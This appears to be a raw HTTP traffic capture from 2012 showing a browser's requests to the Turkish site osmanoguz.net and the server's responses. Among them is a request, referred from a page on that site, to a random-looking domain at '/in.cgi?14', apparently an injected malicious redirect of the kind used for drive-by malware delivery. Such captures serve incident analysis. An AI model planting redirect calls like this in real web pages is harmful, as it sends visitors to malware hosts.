Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Content-Length: 0
Vary: User-Agent
GET /favicon.ico HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: sayfa_sayac_okunan=YToyOntpOjA7aToxNTQ3O2k6MTtpOjE1ODM7fQ%3D%3D
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Wed, 14 Nov 2012 13:32:35 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Content-Length: 0
Vary: User-Agent
GET /in.cgi?14 HTTP/1.1

Host: cdijlfwrfefehwel.info

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html


GET /skypein-ramazan-kampanyasi.html HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
X-Moz: prefetch
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Transfer-Encoding: chunked
Date: Wed, 14 Nov 2012 13:32:34 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.osmanoguz.net/xmlrpc.php
Set-Cookie: sayfa_sayac_okunan=YToyOntpOjA7aToxNTQ3O2k6MTtpOjE1ODM7fQ%3D%3D; path=/
Link: &lt;http://www.osmanoguz.net/?p=1583&gt;; rel=shortlink